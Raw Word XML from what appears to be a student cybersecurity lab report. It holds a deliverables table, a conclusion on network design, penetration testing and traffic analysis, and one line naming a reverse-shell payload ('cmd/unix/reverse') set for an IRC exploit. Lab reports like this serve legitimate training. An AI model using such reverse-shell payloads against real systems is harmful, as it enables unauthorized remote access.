        <w:t xml:space="preserve"> Resolved by manually setting the payload for the IRC exploit (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>cmd/uni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Courier New"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>/reverse</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9965A8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>5. Final Deliverables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35"/>
        <w:gridCol w:w="5684"/>
      </w:tblGrid>
      <w:tr w14:paraId="05DBA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77C1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File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E7784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7C9A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0A52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day04_report.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F3633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This detailed report with diagrams, screenshots, and explanations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F777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EA7A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traffic_analyzer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A45DD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Python script for network traffic analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27FEB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C92D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network_topology.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="183632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Secure network topology design diagram.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F78E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E3C8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packet_size_distribution.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C1EE4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Bar chart of packet size distribution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="580F61BE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D2FAA0">
      <w:pPr>
        <w:pStyle w:val="15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t>This project provided end-to-end experience in cybersecurity fundamentals, covering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91A0AC">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>Proactive defense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> through secure network design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BD9E5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Offensive security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with penetration testing and vulnerability exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07143552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Passive analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of encrypted network traffic patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C41CF7">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>By completing this task, practical skills were developed in identifying weaknesses, mitigating risks, and analyzing network behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE262A">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7B1725"/>
    <w:p w14:paraId="2F338D2E"/>
    <w:p w14:paraId="67BBF407"/>
    <w:p w14:paraId="308D93F9"/>
    <w:p w14:paraId="427292B8"/>
    <w:p w14:paraId="40737FD3"/>
    <w:p w14:paraId="29FB9978"/>
    <w:p w14:paraId="343B65F0"/>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432" w:gutter="0"/>
      <w:pgNumType w:start="1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6DC92">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict>
        <v:rect id="_x0000_i1025" o:spt="1" style="height:1.5pt;width:0pt;" fillcolor="#A0A0A0" filled="t" stroked="f" coordsize="21600,21600" o:hr="t" o:hrstd="t" o:hralign="center">
          <v:path/>
          <v:fill on="t" focussize="0,0"/>
          <v:stroke on="f"/>
          <v:imagedata o:title=""/>
          <o:lock v:ext="edit"/>
          <w10:wrap type="none"/>
          <w10:anchorlock/>
        </v:rect>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="4658A5C1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51FCB"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-1443990</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342265</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618220" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom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6D2"/>
    <w:rsid w:val="0000430C"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="1598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paragraph" w:styleId="11">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="21"/>
    <w:unhideWhenUsed/>
    <w:qFormat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2">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="20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character" w:styleId="13">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8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22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17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8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9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Header Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="1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</Words>
  <Characters>38</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>21</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>43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2025-07-21T00:34:00Z</dcterms:created>
  <dc:creator>ishan</dc:creator>
  <cp:lastModifiedBy>Ishan Chowdhury</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-23T11:53:47Z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2BB2499C993847E68BAEA5891C561ACC_12</vt:lpwstr>
  </property>
</Properties>
</file>